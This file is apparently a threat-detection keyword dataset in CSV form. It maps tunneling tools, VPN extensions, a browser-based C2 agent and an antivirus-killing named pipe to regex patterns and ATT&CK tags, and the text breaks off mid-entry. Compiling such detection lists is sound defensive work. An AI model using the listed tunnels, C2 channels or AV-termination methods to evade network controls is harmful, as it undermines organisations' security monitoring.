"*37206e26ef07932cdc1c9f37bb28242b85c7c895bfcfa0b58c48875e0979daf3*",".{0,1000}37206e26ef07932cdc1c9f37bb28242b85c7c895bfcfa0b58c48875e0979daf3.{0,1000}","greyware_tool_keyword","bore","bore is a simple CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","0","#filehash","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z" "*418ad6ef7472d4a0d275bb3912b5c1498e26efd801344f581f6eb63e1076e2c4*",".{0,1000}418ad6ef7472d4a0d275bb3912b5c1498e26efd801344f581f6eb63e1076e2c4.{0,1000}","greyware_tool_keyword","bore","bore is a simple CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - 
TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","0","#filehash","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z" "*466de31afaad2ff25fb1e080ec326c31d4d08bc8639b2c957f3f02f2e5900139*",".{0,1000}466de31afaad2ff25fb1e080ec326c31d4d08bc8639b2c957f3f02f2e5900139.{0,1000}","greyware_tool_keyword","bore","bore is a simple CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","0","#filehash","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z" "*4bc74cda62178ccf38917109af3b74d7612ac1fbc234d9c69f0be49e5b7425ce*",".{0,1000}4bc74cda62178ccf38917109af3b74d7612ac1fbc234d9c69f0be49e5b7425ce.{0,1000}","greyware_tool_keyword","bore","bore is a simple CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","0","#filehash","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z" "*568ec361aa33903f8cf1678a5b35592887ea6e3de3fae6a1f752730ca2e8e82c*",".{0,1000}568ec361aa33903f8cf1678a5b35592887ea6e3de3fae6a1f752730ca2e8e82c.{0,1000}","greyware_tool_keyword","bore","bore is a simple CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","0","#filehash","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z" "*66ae97d291d0e2d0dae8a8642fb8d2872a6dd0183aff325b7eaedcc911284741*",".{0,1000}66ae97d291d0e2d0dae8a8642fb8d2872a6dd0183aff325b7eaedcc911284741.{0,1000}","greyware_tool_keyword","bore","bore is a simple CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","0","#filehash","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z" 
"*703e2d2c0fa3fb1e6b7f1a5249533072d9d9caeaf7811dbe1750ee43c1ef0501*",".{0,1000}703e2d2c0fa3fb1e6b7f1a5249533072d9d9caeaf7811dbe1750ee43c1ef0501.{0,1000}","greyware_tool_keyword","bore","bore is a simple CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","0","#filehash","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z" "*7f36205ce8bfa40c35723afeee04f94c3a3c978b6076c321b6d108d4c7f04963*",".{0,1000}7f36205ce8bfa40c35723afeee04f94c3a3c978b6076c321b6d108d4c7f04963.{0,1000}","greyware_tool_keyword","bore","bore is a simple CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","0","#filehash","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z" "*a583e31f6c18a593b681896402295f35a903df7bc34faae45914679b3e9751b9*",".{0,1000}a583e31f6c18a593b681896402295f35a903df7bc34faae45914679b3e9751b9.{0,1000}","greyware_tool_keyword","bore","bore is a simple CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","0","#filehash","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z" "*ad5c1453508585d413c083df1571738ae1158b7a83aeab24c456548fb0e4cdbd*",".{0,1000}ad5c1453508585d413c083df1571738ae1158b7a83aeab24c456548fb0e4cdbd.{0,1000}","greyware_tool_keyword","bore","bore is a simple CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","0","#filehash","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z" "*ae37bedf1ad63fabd9843da4dc3598e80bc135b820555842cc20cad4f95164ff*",".{0,1000}ae37bedf1ad63fabd9843da4dc3598e80bc135b820555842cc20cad4f95164ff.{0,1000}","greyware_tool_keyword","bore","bore is a simple 
CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","0","#filehash","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z" "*ba68f7b9e8eb49325a28ed27d1ff542919952145af371b144cc7effdd0d561d9*",".{0,1000}ba68f7b9e8eb49325a28ed27d1ff542919952145af371b144cc7effdd0d561d9.{0,1000}","greyware_tool_keyword","bore","bore is a simple CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","0","#filehash","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z" "*bb25b3f72e24573d9695f7bb677500a695ad46ce61b61dae5d13fb035ce071c2*",".{0,1000}bb25b3f72e24573d9695f7bb677500a695ad46ce61b61dae5d13fb035ce071c2.{0,1000}","greyware_tool_keyword","bore","bore is a simple CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","0","#filehash","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z" "*bea23804b59ef8bc8cbd4e03054e2b89baccf01b2640013e3b1b7db85c5f6b2e*",".{0,1000}bea23804b59ef8bc8cbd4e03054e2b89baccf01b2640013e3b1b7db85c5f6b2e.{0,1000}","greyware_tool_keyword","bore","bore is a simple CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","0","#filehash","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z" "*bore local * --to *",".{0,1000}bore\slocal\s.{0,1000}\s\-\-to\s.{0,1000}","greyware_tool_keyword","bore","bore is a simple CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","0","N/A","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z" "*bore server --secret 
*",".{0,1000}bore\sserver\s\-\-secret\s.{0,1000}","greyware_tool_keyword","bore","bore is a simple CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","0","N/A","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z" "*c9bdea295fc4e88e634edc48697912379334da2c771e6130dc1702e32e70672c*",".{0,1000}c9bdea295fc4e88e634edc48697912379334da2c771e6130dc1702e32e70672c.{0,1000}","greyware_tool_keyword","bore","bore is a simple CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","0","#filehash","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z" "*c9e87a3b55c42f86a7fbbb0bd11063d7d601988d8a31db7cf1b7c827654b0dc6*",".{0,1000}c9e87a3b55c42f86a7fbbb0bd11063d7d601988d8a31db7cf1b7c827654b0dc6.{0,1000}","greyware_tool_keyword","bore","bore is a simple CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","0","#filehash","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z" "*ekzhang/bore*",".{0,1000}ekzhang\/bore.{0,1000}","greyware_tool_keyword","bore","bore is a simple CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","1","N/A","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z" "*f606f2a59706479d9cab36d16b9c241e204edb46540c92333521872dfcda025f*",".{0,1000}f606f2a59706479d9cab36d16b9c241e204edb46540c92333521872dfcda025f.{0,1000}","greyware_tool_keyword","bore","bore is a simple CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - 
TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","0","#filehash","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z" "*http://bore.pub/*",".{0,1000}http\:\/\/bore\.pub\/.{0,1000}","greyware_tool_keyword","bore","bore is a simple CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","1","N/A","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z" "* boringproxy-client.service*",".{0,1000}\sboringproxy\-client\.service.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","N/A","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z" "* boringproxy-server.service*",".{0,1000}\sboringproxy\-server\.service.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","N/A","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z" "* -m boringproxy*",".{0,1000}\s\-m\sboringproxy.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","N/A","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z" "*./boringproxy server*",".{0,1000}\.\/boringproxy\sserver.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. 
Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","N/A","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z" "*/bin/boringproxy*",".{0,1000}\/bin\/boringproxy.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","N/A","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z" "*/boringproxy.git*",".{0,1000}\/boringproxy\.git.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","1","N/A","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z" "*/boringproxy-client.service*",".{0,1000}\/boringproxy\-client\.service.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","1","N/A","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z" "*/boringproxy-server.service*",".{0,1000}\/boringproxy\-server\.service.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","1","N/A","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z" "*/home/boringproxy*",".{0,1000}\/home\/boringproxy.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. 
Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","N/A","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z" "*/tmp/boringproxy-client*",".{0,1000}\/tmp\/boringproxy\-client.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","N/A","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z" "*23d61c88520628dc2ab58b25e556df92640327ca4f946cd8ea30eb813897d107*",".{0,1000}23d61c88520628dc2ab58b25e556df92640327ca4f946cd8ea30eb813897d107.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","#filehash","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z" "*34362de1defeb018d71e6319afabca362fa4acd69341bfcfb3ce77b6e8c61a6a*",".{0,1000}34362de1defeb018d71e6319afabca362fa4acd69341bfcfb3ce77b6e8c61a6a.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","#filehash","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z" "*403d4848966e4e5e7859758766269a5340f309c641e71f65fd3cf4b01049b8d9*",".{0,1000}403d4848966e4e5e7859758766269a5340f309c641e71f65fd3cf4b01049b8d9.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. 
Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","#filehash","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z" "*47532247f32b7a9f42b0dfe5a1314a674e92deef79eaab647af34507a677d375*",".{0,1000}47532247f32b7a9f42b0dfe5a1314a674e92deef79eaab647af34507a677d375.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","#filehash","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z" "*5805e0f064ce3aa72e5a0b4dd00c0bf4150995cb1f1b7b80f2b3a78da78d1d27*",".{0,1000}5805e0f064ce3aa72e5a0b4dd00c0bf4150995cb1f1b7b80f2b3a78da78d1d27.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","#filehash","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z" "*7a778797dd640eb51defe912e8b6872df92241927193106590a2ccb92a5dc926*",".{0,1000}7a778797dd640eb51defe912e8b6872df92241927193106590a2ccb92a5dc926.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","#filehash","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z" "*828ee46c07c36e54f11e38f01898e3bd215739c28bbcf05606abe00ba0c6c51f*",".{0,1000}828ee46c07c36e54f11e38f01898e3bd215739c28bbcf05606abe00ba0c6c51f.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. 
Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","#filehash","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z" "*89bd3a31299f6bbf9be9bcf5f1456c11333590290626f11017079fd84ee58ca1*",".{0,1000}89bd3a31299f6bbf9be9bcf5f1456c11333590290626f11017079fd84ee58ca1.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","#filehash","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z" "*9a688243e33a6cddb1bb4807277e352118141e7321385024cbff655a00b7b660*",".{0,1000}9a688243e33a6cddb1bb4807277e352118141e7321385024cbff655a00b7b660.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","#filehash","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z" "*a262487a6bac019c52f1ada940aa357f0be3c69cf1232a052115e74723a65ade*",".{0,1000}a262487a6bac019c52f1ada940aa357f0be3c69cf1232a052115e74723a65ade.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","#filehash","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z" "*b4f3bc92ccedfbb0714c662c8d6a7842e71f1ebb2d8392ec5064b314dd5dede5*",".{0,1000}b4f3bc92ccedfbb0714c662c8d6a7842e71f1ebb2d8392ec5064b314dd5dede5.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. 
Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","#filehash","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z" "*boringproxy client -server *",".{0,1000}boringproxy\sclient\s\-server\s.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","N/A","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z" "*boringproxy/boringproxy*",".{0,1000}boringproxy\/boringproxy.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","1","N/A","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z" "*boringproxy_db.json*",".{0,1000}boringproxy_db\.json.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","1","N/A","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z" "*boringproxy-client@default.service*",".{0,1000}boringproxy\-client\@default\.service.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","N/A","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z" "*chown boringproxy:boringproxy *",".{0,1000}chown\sboringproxy\:boringproxy\s.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. 
Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","N/A","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z" "*cmd/boringproxy*",".{0,1000}cmd\/boringproxy.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","1","N/A","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z" "*f2915f5a3885391738923ecd18faf840074c65cd2e390e1474a4d84ce315b9ff*",".{0,1000}f2915f5a3885391738923ecd18faf840074c65cd2e390e1474a4d84ce315b9ff.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","#filehash","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z" "*f5b42d933cea4d53aa975039de0cb1053287fac5ce4377d2afb663e26a5d22dd*",".{0,1000}f5b42d933cea4d53aa975039de0cb1053287fac5ce4377d2afb663e26a5d22dd.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","#filehash","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z" "*groupadd boringproxy*",".{0,1000}groupadd\sboringproxy.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. 
Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","N/A","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z" "*https://boringproxy.io/installation*",".{0,1000}https\:\/\/boringproxy\.io\/installation.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","1","N/A","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z" "*pkill -u boringproxy*",".{0,1000}pkill\s\-u\sboringproxy.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","N/A","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z" "*runuser -l boringproxy *",".{0,1000}runuser\s\-l\sboringproxy\s.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","N/A","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z" "*setcap cap_net_bind_service=+ep boringproxy*",".{0,1000}setcap\scap_net_bind_service\=\+ep\sboringproxy.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. 
Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","N/A","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z" "*usermod -a -G boringproxy boringproxy*",".{0,1000}usermod\s\-a\s\-G\sboringproxy\sboringproxy.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","N/A","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z" "*omghfjlpggmjjaagoclmmobgdodcjboh*",".{0,1000}omghfjlpggmjjaagoclmmobgdodcjboh.{0,1000}","greyware_tool_keyword","Browsec VPN","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*jdgilggpfmjpbodmhndmhojklgfdlhob*",".{0,1000}jdgilggpfmjpbodmhndmhojklgfdlhob.{0,1000}","greyware_tool_keyword","Browser VPN","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*&browser=tor&api=false*",".{0,1000}\&browser\=tor\&api\=false.{0,1000}","greyware_tool_keyword","browser.lol","Virtual Browser - Safely visit blocked or risky websites - can be used to bypass network restrictions within a corporate environment","T1071 - T1090 - T1562","TA0005","N/A","N/A","Defense 
Evasion","https://browser.lol","1","1","N/A","N/A","8","9","N/A","N/A","N/A","N/A" "*.srv.browser.lol*",".{0,1000}\.srv\.browser\.lol.{0,1000}","greyware_tool_keyword","browser.lol","Virtual Browser - Safely visit blocked or risky websites - can be used to bypass network restrictions within a corporate environment","T1071 - T1090 - T1562","TA0005","N/A","N/A","Defense Evasion","https://browser.lol","1","1","N/A","N/A","8","9","N/A","N/A","N/A","N/A" "*browser.lol/create*",".{0,1000}browser\.lol\/create.{0,1000}","greyware_tool_keyword","browser.lol","Virtual Browser - Safely visit blocked or risky websites - can be used to bypass network restrictions within a corporate environment","T1071 - T1090 - T1562","TA0005","N/A","N/A","Defense Evasion","https://browser.lol","1","1","N/A","N/A","8","9","N/A","N/A","N/A","N/A" "*https://browser.lol/vnc?server=*",".{0,1000}https\:\/\/browser\.lol\/vnc\?server\=.{0,1000}","greyware_tool_keyword","browser.lol","Virtual Browser - Safely visit blocked or risky websites - can be used to bypass network restrictions within a corporate environment","T1071 - T1090 - T1562","TA0005","N/A","N/A","Defense Evasion","https://browser.lol","1","1","N/A","N/A","8","9","N/A","N/A","N/A","N/A" "*http://127.0.0.1:8081*",".{0,1000}http\:\/\/127\.0\.0\.1\:8081.{0,1000}","greyware_tool_keyword","Browser-C2","Post Exploitation agent which uses a browser to do C2 operations.","T1105 - T1102","TA0003 - TA0005 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/Browser-C2","1","1","N/A","N/A","10","10","99","28","2018-05-25T15:12:21Z","2018-05-22T14:33:24Z" "*https://*.btunnel.co.in*",".{0,1000}https\:\/\/.{0,1000}\.btunnel\.co\.in.{0,1000}","greyware_tool_keyword","btunnel.in","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://www.btunnel.in/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*chioafkonnhbpajpengbalkececleldf*",".{0,1000}chioafkonnhbpajpengbalkececleldf.{0,1000}","greyware_tool_keyword","BullVPN","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*\\\\.\\aswSP_Avar*",".{0,1000}\\\\\\\\\.\\\\aswSP_Avar.{0,1000}","greyware_tool_keyword","Burntcigar KillAV","Scans for process names linked to known antivirus or EDR products - then adds their process IDs to a stack for later termination - often used by attackers","T1089 - T1489 - T1562","TA0005","KillAV","Cuba","Malware","https://www.virustotal.com/gui/file/aeb044d310801d546d10b247164c78afde638a90b6ef2f04e1f40170e54dec03?nocache=1","1","0","#namedpipe","avast named pipe - subject to false positives","10","10","N/A","N/A","N/A","N/A" "*http://canarytokens.com/*/*",".{0,1000}http\:\/\/canarytokens\.com\/.{0,1000}\/.{0,1000}","greyware_tool_keyword","canarytokens.com","free honeypot detection tokens but also abused by attacker for payload callback confirmation","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","http://canarytokens.com","1","1","N/A","Out of band interaction domains","10","10","N/A","N/A","N/A","N/A" "*cat 